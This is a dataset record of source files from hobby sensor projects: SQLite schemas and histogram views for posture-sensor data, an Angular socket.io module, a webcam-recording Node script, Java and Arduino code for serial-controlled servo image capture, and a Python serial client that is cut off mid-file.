REAL DEFAULT NULL,\n right_magn_mag REAL DEFAULT NULL\n);\n\nCREATE TABLE IF NOT EXISTS PhoneData(\n timestamp REAL PRIMARY KEY,\n activity INTEGER NOT NULL,\n activity_confidence REAL NOT NULL,\n pedometer_num_steps REAL NOT NULL,\n pedometer_current_pace REAL NOT NULL,\n pedometer_current_cadence REAL NOT NULL,\n altimeter_relative_altitude REAL NOT NULL,\n altimeter_pressure REAL NOT NULL\n);\n\nCREATE TABLE IF NOT EXISTS GPSData(\n location_timestamp REAL PRIMARY KEY,\n timestamp REAL NOT NULL,\n location_latitude REAL NOT NULL,\n location_longitude REAL NOT NULL,\n location_altitude REAL NOT NULL,\n location_speed REAL NOT NULL,\n location_course REAL NOT NULL,\n location_vertical_accuracy REAL NOT NULL,\n location_horizontal_accuracy REAL NOT NULL,\n location_floor REAL NOT NULL,\n FOREIGN KEY (timestamp) REFERENCES PhoneData(timestamp)\n);\n\n-- Torso Histograms\nCREATE VIEW IF NOT EXISTS TorsoYawHist AS\n SELECT round(torso_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS TorsoPitchHist AS\n SELECT round(torso_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS TorsoRollHist AS\n SELECT round(torso_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS TorsoYawPitchHist AS\n SELECT\n round(torso_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(torso_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS TorsoYawPitchRollHist AS\n SELECT\n round(torso_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(torso_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(torso_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n\n-- Head Histograms\nCREATE VIEW IF NOT EXISTS HeadYawHist AS\n SELECT round(head_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadPitchHist AS\n SELECT round(head_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRollHist AS\n SELECT round(head_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadYawPitchHist AS\n SELECT\n round(head_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS HeadYawPitchRollHist AS\n SELECT\n round(head_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(head_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n\n-- Head Relative Histograms\nCREATE VIEW IF NOT EXISTS HeadRelativeYawHist AS\n SELECT round(head_relative_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRelativePitchHist AS\n SELECT round(head_relative_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRelativeRollHist AS\n SELECT round(head_relative_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRelativeYawPitchHist AS\n SELECT\n round(head_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS HeadRelativeYawPitchRollHist AS\n SELECT\n round(head_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(head_relative_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n\n-- Lest Histogram\nCREATE VIEW IF NOT EXISTS LeftYawHist AS\n SELECT round(left_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftPitchHist AS\n SELECT round(left_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRollHist AS\n SELECT round(left_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftYawPitchHist AS\n SELECT\n round(left_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(left_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS LeftYawPitchRollHist AS\n SELECT\n round(left_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(left_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(left_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n\n--Left Relative Histogram\nCREATE VIEW IF NOT EXISTS LeftRelativeYawHist AS\n SELECT round(left_relative_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRelativePitchHist AS\n SELECT round(left_relative_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRelativeRollHist AS\n SELECT round(left_relative_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRelativeYawPitchHist AS\n SELECT\n round(left_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(left_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS LeftRelativeYawPitchRollHist AS\n SELECT\n round(left_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(left_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(left_relative_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n\n-- Right histogram\nCREATE VIEW IF NOT EXISTS RightYawHist AS\n SELECT round(right_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightPitchHist AS\n SELECT round(right_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightRollHist AS\n SELECT round(right_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightYawPitchHist AS\n SELECT\n round(right_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(right_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS RightYawPitchRollHist AS\n SELECT\n round(right_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(right_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(right_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n-- Right Relative histogram\nCREATE VIEW IF NOT EXISTS RightRelativeYawHist AS\n SELECT round(right_relative_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightRelativePitchHist AS\n SELECT round(right_relative_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightRelativeRollHist AS\n SELECT round(right_relative_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightRelativeYawPitchHist AS\n SELECT\n round(right_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(right_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS RightRelativeYawPitchRollHist AS\n SELECT\n round(right_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(right_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(right_relative_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;"
},
{
"alpha_fraction": 0.6279317736625671,
"alphanum_fraction": 0.6321961879730225,
"avg_line_length": 32.5,
"blob_id": "fd755bd70590787a106fc2d762958148df833427",
"content_id": "3b094470045cf9bd3320714c714529096ff81295",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 28,
"path": "/oriTrakHAR-master/rawDataVis/src/app/modules/ng2-socket-io/ng2-socket-io.module.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { NgModule, ModuleWithProviders } from '@angular/core';\n// This module is a basically a copy-paste of the ng2-socket-io on npm.\n// Its angular version is < 4 and it doesn't play well with the rest of the code,\n// so I refactored it here.\nimport { SocketIoService } from './socket-io.service';\nimport { SocketIoConfig } from './socketIoConfig';\n\nexport function SocketFactory(config: SocketIoConfig) {\n return new SocketIoService(config);\n}\nexport const socketConfig = '__SOCKET_IO_CONFIG__';\n@NgModule({})\n\nexport class Ng2SocketIoModule {\n static forRoot(config: SocketIoConfig): ModuleWithProviders {\n return {\n ngModule: Ng2SocketIoModule,\n providers: [\n { provide: socketConfig, useValue: config },\n {\n provide: SocketIoService,\n useFactory: SocketFactory,\n deps : [socketConfig]\n }\n ]\n };\n }\n}\n"
},
{
"alpha_fraction": 0.552601158618927,
"alphanum_fraction": 0.5930635929107666,
"avg_line_length": 29.89285659790039,
"blob_id": "814572e1f197c4172f7c5279d4098c0400d1460c",
"content_id": "e5be0401a6153b4f0ab389c4410596447ce5829a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 865,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 28,
"path": "/oriTrakHAR-master/sensorDataCollection/webCam/runWebCam.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "const child_process = require('child_process')\n\nfunction genDateFormatString () {\n var d = new Date()\n return ('00' + (d.getMonth() + 1)).slice(-2) + '-' +\n ('00' + d.getDate()).slice(-2) + '-' +\n d.getFullYear() + '_' +\n ('00' + d.getHours()).slice(-2) + '-' +\n ('00' + d.getMinutes()).slice(-2) + '-' +\n ('00' + d.getSeconds()).slice(-2)\n}\n\nconst cmd = `ffmpeg -f video4linux2 -input_format mjpeg -r 25 -i /dev/video0 \\\n-vf \"drawtext=fontfile=/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf: \\\ntext='%{localtime\\\\:%T}': [email protected]: x=7: y=210\" -vcodec libx264 \\\n-preset veryfast -f mp4 -pix_fmt yuv420p -y \"${genDateFormatString()}_groundTruth.mp4\"`\n\nchild_process.exec(cmd, (err, stdout, stderr) => {\n if (err) {\n console.log(err)\n }\n if (stdout) {\n console.log(stdout)\n }\n if (stderr) {\n console.log(stderr)\n }\n})\n"
},
{
"alpha_fraction": 0.6555601954460144,
"alphanum_fraction": 0.6730529069900513,
"avg_line_length": 41.122806549072266,
"blob_id": "e2e765251a3f2f66c3281686e464239d67f6ba43",
"content_id": "565eb1f156591e2acaa62a337dd1a5f13f0df6c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2401,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 57,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/dbInit.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS SensorData100Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n quat_w REAL NOT NULL,\n quat_x REAL NOT NULL,\n quat_y REAL NOT NULL,\n quat_z REAL NOT NULL,\n gyro_x REAL NOT NULL,\n gyro_y REAL NOT NULL,\n gyro_z REAL NOT NULL,\n lacc_x REAL NOT NULL,\n lacc_y REAL NOT NULL,\n lacc_z REAL NOT NULL,\n acc_x REAL NOT NULL,\n acc_y REAL NOT NULL,\n acc_z REAL NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorData20Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n mag_x REAL NOT NULL,\n mag_y REAL NOT NULL,\n mag_z REAL NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorData1Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n temp INTEGER NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorFreq(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n frequency INTEGER NOT NULL\n);\n\nCREATE INDEX IF NOT EXISTS sensor_timestamp_100 ON SensorData100Hz(sensor_timestamp);\nCREATE INDEX IF NOT EXISTS server_timestamp_100 ON SensorData100Hz(server_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_timestamp_20 ON SensorData20Hz(sensor_timestamp);\nCREATE INDEX IF NOT EXISTS SensorFreq_server_timestamp ON SensorFreq(server_timestamp);\nCREATE INDEX IF NOT EXISTS server_timestamp_20 ON SensorData20Hz(server_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_timestamp_1 ON SensorData1Hz(sensor_timestamp);\nCREATE INDEX IF NOT EXISTS server_timestamp_1 ON SensorData1Hz(server_timestamp);\nCREATE INDEX IF NOT EXISTS id_100 ON SensorData100Hz(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS id_20 ON SensorData20Hz(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS id_1 ON SensorData1Hz(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS SensorFreq_id ON SensorFreq(sensor_id, server_id)\n"
}
] | 50 |
tk6996/SerialComm
|
https://github.com/tk6996/SerialComm
|
d68d57fb30310802271fe02424d28889eda5c93f
|
43d5f6126124fc21810a81cf8b9ff2b1e1e72a76
|
734385a40c9a71a8a02fdcddc4de6fe379b06c43
|
refs/heads/master
| 2020-09-13T03:51:15.002162 | 2019-11-28T12:49:19 | 2019-11-28T12:49:19 | 222,648,193 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.532260537147522,
"alphanum_fraction": 0.5591830611228943,
"avg_line_length": 28.117116928100586,
"blob_id": "f59d9e30615c51056a5d8170e60c9179b4230e2c",
"content_id": "ce44ef3d6221acf070129b0717850342fd6fa6e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6463,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 222,
"path": "/src/com/epam/MainProgram.java",
"repo_name": "tk6996/SerialComm",
"src_encoding": "UTF-8",
"text": "package com.epam;\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.io.OutputStream;\nimport java.awt.image.BufferedImage;\nimport java.util.Enumeration;\n\nimport javax.comm.CommPortIdentifier;\nimport javax.comm.UnsupportedCommOperationException;\nimport javax.imageio.ImageIO;\n\npublic class MainProgram {\n\tpublic static char[] angle = new char[3]; // -45* 0* 45*\n\n\tpublic static void main(String[] args) {\n\t\ttry {\n\t\t\tfinal String Arduino2 = \"COM15\";\n\t\t\tfinal String Arduino3 = \"COM14\";\n\t\t\tfinal String Arduino4 = \"COM7\";\n\t\t\tSimpleRead sRead = null;\n\t\t\tControl ctr = null;\n\t\t\tServoControl servo = null;\n\t\t\tfinal Enumeration<?> portList = CommPortIdentifier.getPortIdentifiers();\n\t\t\tCommPortIdentifier pid = null;\n\t\t\twhile (portList.hasMoreElements()) {\n\t\t\t\tpid = (CommPortIdentifier) portList.nextElement();\n\t\t\t\tif (pid.getPortType() == CommPortIdentifier.PORT_SERIAL) {\n\t\t\t\t\tSystem.out.println(\"Port name: \" + pid.getName());\n\n\t\t\t\t\tif (pid.getName().equals(Arduino2)) {\n\t\t\t\t\t\tctr = new Control(pid);\n\t\t\t\t\t}\n\t\t\t\t\tif (pid.getName().equals(Arduino3)) {\n\t\t\t\t\t\tsRead = new SimpleRead(pid);\n\t\t\t\t\t}\n\t\t\t\t\tif (pid.getName().equals(Arduino4)) {\n\t\t\t\t\t\tservo = new ServoControl(pid);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tif (ctr == null || sRead == null || servo == null)\n\t\t\t\tthrow new UnsupportedCommOperationException();\n\t\t\t/*\n\t\t\t * long time = System.currentTimeMillis(); while (System.currentTimeMillis() -\n\t\t\t * time < 5000) {\n\t\t\t * \n\t\t\t * }\n\t\t\t */\n\t\t\tSystem.out.println(\"Ready Command\");\n\t\t\twhile (true) {\n\t\t\t\t// char comm = (char) System.in.read();\n\t\t\t\tchar comm = (char) ctr.waitingStart();\n\t\t\t\t// System.out.println(comm);\n\t\t\t\tif (comm == 'S') {\n\t\t\t\t\tangle[0] = angle[1] = angle[2] = (char) -1;\n\t\t\t\t\tfor (int i = 0; i < 3; i++) {\n\t\t\t\t\t\t// System.out.println(i + (int)'1');\n\t\t\t\t\t\tservo.rotage(i);\n\t\t\t\t\t\tchar type = (char) -1;\n\t\t\t\t\t\tdo {\n\t\t\t\t\t\t\tint[][] data = sRead.readPic();\n\t\t\t\t\t\t\ttype = analysis(data);\n\t\t\t\t\t\t} while (type == (char) -1);\n\t\t\t\t\t\tangle[i] = type;\n\t\t\t\t\t\tSystem.out.println(\"Finish image \" + i);\n\t\t\t\t\t}\n\t\t\t\t\tfor (int i = 0; i < 3; i++) {\n\t\t\t\t\t\tswitch (i) {\n\t\t\t\t\t\tcase 0:\n\t\t\t\t\t\t\tSystem.out.println(\"angle = -45* , type = \" + typeImg(angle[0]));\n\t\t\t\t\t\t\tctr.outputStream.write((byte) 1);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tctr.outputStream.write(angle[0]);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tcase 1:\n\t\t\t\t\t\t\tSystem.out.println(\"angle = 0* , type = \" + typeImg(angle[1]));\n\t\t\t\t\t\t\tctr.outputStream.write((byte) 2);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tctr.outputStream.write(angle[1]);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tcase 2:\n\t\t\t\t\t\t\tSystem.out.println(\"angle = 45* , type = \" + typeImg(angle[2]));\n\t\t\t\t\t\t\tctr.outputStream.write((byte) 3);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tctr.outputStream.write(angle[2]);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tservo.rotage(1);\n\t\t\t\t}\n\t\t\t\tif (\"TBLRUD\".indexOf(comm) >= 0) {\n\t\t\t\t\tfor (int i = 0; i < 3; i++) {\n\t\t\t\t\t\tif (angle[i] == comm) {\n\t\t\t\t\t\t\tservo.rotage(i);\n\t\t\t\t\t\t\tchar type = (char) -1;\n\t\t\t\t\t\t\tdo {\n\t\t\t\t\t\t\t\tint[][] data = sRead.readPic();\n\t\t\t\t\t\t\t\ttype = analysis(data);\n\t\t\t\t\t\t\t} while (type != angle[i]);\n\t\t\t\t\t\t\tsendDataPixel(ctr);\n\t\t\t\t\t\t\t// sendDataPixel(System.out);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tSystem.out.println(\"Finish Send Data\");\n\t\t\t\t}\n\t\t\t}\n\t\t} catch (Exception e) {\n\t\t\te.printStackTrace();\n\t\t}\n\t}\n\n\tpublic static char analysis(int[][] data /* coordinate [y][x] */) {\n\t\t// System.out.println(data.length + \" \" + data[0].length);\n\t\t// pixelAnalysis coordinate [x][y]\n\t\tint[][] pixelAnalysis = { { 23, 68 }, // triangle lower left\n\t\t\t\t{ 68, 23 }, // triangle upper left\n\t\t\t\t{ 135, 45 }, // upper right\n\t\t\t\t{ 45, 135 }, // lower left\n\t\t\t\t{ 113, 158 }, // triangle lower right\n\t\t\t\t{ 158, 113 } }; // triangle upper right\n\t\tint collectWhite = 0; // check error\n\t\tfor (int i = 0; i < 6; i++) {\n\t\t\tif (data[pixelAnalysis[i][1]][pixelAnalysis[i][0]] != data[pixelAnalysis[i][1]][pixelAnalysis[i][0] - 1]\n\t\t\t\t\t&& data[pixelAnalysis[i][1]][pixelAnalysis[i][0]] != data[pixelAnalysis[i][1]][pixelAnalysis[i][0]\n\t\t\t\t\t\t\t+ 1]) {\n\t\t\t\tSystem.out.println(\"Image Error at x = \" + pixelAnalysis[i][0] + \" y = \" + pixelAnalysis[i][1]);\n\t\t\t\treturn (char) -1;\n\t\t\t}\n\t\t}\n\t\tfor (int i = 0; i < pixelAnalysis.length; i++)\n\t\t\tcollectWhite |= ((data[pixelAnalysis[i][1]][pixelAnalysis[i][0]] > 0 ? 1 : 0) << i);\n\t\tif (collectWhite == 0b000111)\n\t\t\treturn 'T';\n\t\telse if (collectWhite == 0b111000)\n\t\t\treturn 'B';\n\t\telse if (collectWhite == 0b001011)\n\t\t\treturn 'L';\n\t\telse if (collectWhite == 0b110100)\n\t\t\treturn 'R';\n\t\telse if (collectWhite == 0b100110)\n\t\t\treturn 'U';\n\t\telse if (collectWhite == 0b011001)\n\t\t\treturn 'D';\n\t\telse {\n\t\t\tSystem.out.println(\"Error Detect Value : \" + Integer.toBinaryString(collectWhite));\n\t\t\treturn (char) -1;\n\t\t}\n\n\t}\n\n\tpublic static void sendDataPixel(Control ctr) throws IOException {\n\n\t\tSystem.out.println(\"Waiting\");\n\t\tBufferedImage buf = ImageIO.read(new File(\"c:/datacom/use/raw.bmp\"));\n\n\t\tfor (int i = 1; i < 5; i++) {\n\t\t\tfor (int j = 1; j < 5; j++) {\n\t\t\t\tSystem.out.println(\"Pos x = \" + j * buf.getWidth() / 5 + \" Pos y = \" + i * buf.getHeight() / 5\n\t\t\t\t\t\t+ \" PixelValue = \" + (buf.getRGB(j * buf.getWidth() / 5, i * buf.getHeight() / 5) & 0xFF));\n\n\t\t\t\tctr.outputStream.write((byte) (0x1F & (byte) (j * buf.getWidth() / 5)));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) ((0xF & (byte) ((j * buf.getWidth() / 5) >> 5))));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) (0x1F & (int) (i * buf.getHeight() / 5)));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) ((0xF & (byte) ((i * buf.getHeight() / 5) >> 5))));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) (buf.getRGB(j * buf.getWidth() / 5, i * buf.getHeight() / 5) & 0xFF));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// return;*/\n\t}\n\n\tpublic static String typeImg(char t) {\n\t\tString type = null;\n\t\tswitch (t) {\n\t\tcase 'T':\n\t\t\ttype = \"Top\";\n\t\t\tbreak;\n\t\tcase 'B':\n\t\t\ttype = \"Bottom\";\n\t\t\tbreak;\n\t\tcase 'L':\n\t\t\ttype = \"Left\";\n\t\t\tbreak;\n\t\tcase 'R':\n\t\t\ttype = \"Right\";\n\t\t\tbreak;\n\t\tcase 'U':\n\t\t\ttype = \"Upper\";\n\t\t\tbreak;\n\t\tcase 'D':\n\t\t\ttype = \"Lower\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tbreak;\n\t\t}\n\t\treturn type;\n\t}\n\n}"
},
{
"alpha_fraction": 0.5730858445167542,
"alphanum_fraction": 0.6148492097854614,
"avg_line_length": 18.590909957885742,
"blob_id": "6abd1d376437f61100fc4abd405291c0f6b2919e",
"content_id": "5a71824498336253b71ba50504323fdc917d677a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 22,
"path": "/bin/ServoControl/ServoControl.ino",
"repo_name": "tk6996/SerialComm",
"src_encoding": "UTF-8",
"text": "#include <Servo.h>\nServo Horizontal = Servo();\nServo Vertical = Servo();\nvoid setup() {\n Serial.begin(9600);\n Horizontal.attach(9);\n Vertical.attach(10);\n Vertical.write(150);\n Horizontal.write(90);\n}\n\nvoid loop() {\n if (Serial.available() > 1)\n {\n switch(Serial.read())\n {\n case 1 : Horizontal.write((int)Serial.read()); break;\n case 2 : Vertical.write((int)Serial.read()); break;\n }\n }\n delay(100);\n}\n"
},
{
"alpha_fraction": 0.438800185918808,
"alphanum_fraction": 0.45476534962654114,
"avg_line_length": 49.414634704589844,
"blob_id": "a9202581407da3519a5642f73deb787c0792efac",
"content_id": "96be978da2d0a69c07a769db82c8c8665958819d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2067,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 41,
"path": "/bin/InputPC1.py",
"repo_name": "tk6996/SerialComm",
"src_encoding": "UTF-8",
"text": "import serial\nimport sys\nportName = \"COM16\"\nif __name__ == \"__main__\":\n try:\n myserial = serial.Serial(portName, 9600)\n state = 0\n type_img = {'T': \"Top\", 'B': \"Bottom\", 'L': \"Left\",\n 'R': \"Right\", 'U': \"Upper\", 'D': \"Lower\"}\n img_angle = []\n while True:\n print(\"--------------------------------\")\n command = input(\n \"Enter \\\"Start\\\" for Activate\\n\" if state ==\n 0 else \"Enter Type Image for Capture and Receive Data\\n\" + img_angle.__str__() + \"\\n\")\n if state == 0 and command.lower() == \"start\":\n myserial.write(ord('S').to_bytes(1,\"big\"))\n img_angle = []\n for _ in range(3):\n angle = int.from_bytes(myserial.read(), \"big\")\n angle = angle if angle < 128 else - (256 - angle)\n typeImgage = type_img[myserial.read().decode(\"utf-8\")]\n print(\"Angle\", angle.__str__().center(\n 5), \"Type Image\", typeImgage)\n img_angle.append(typeImgage)\n state = 1\n elif state == 1 and command in img_angle:\n for key, value in type_img.items():\n if value.lower() == command.lower():\n 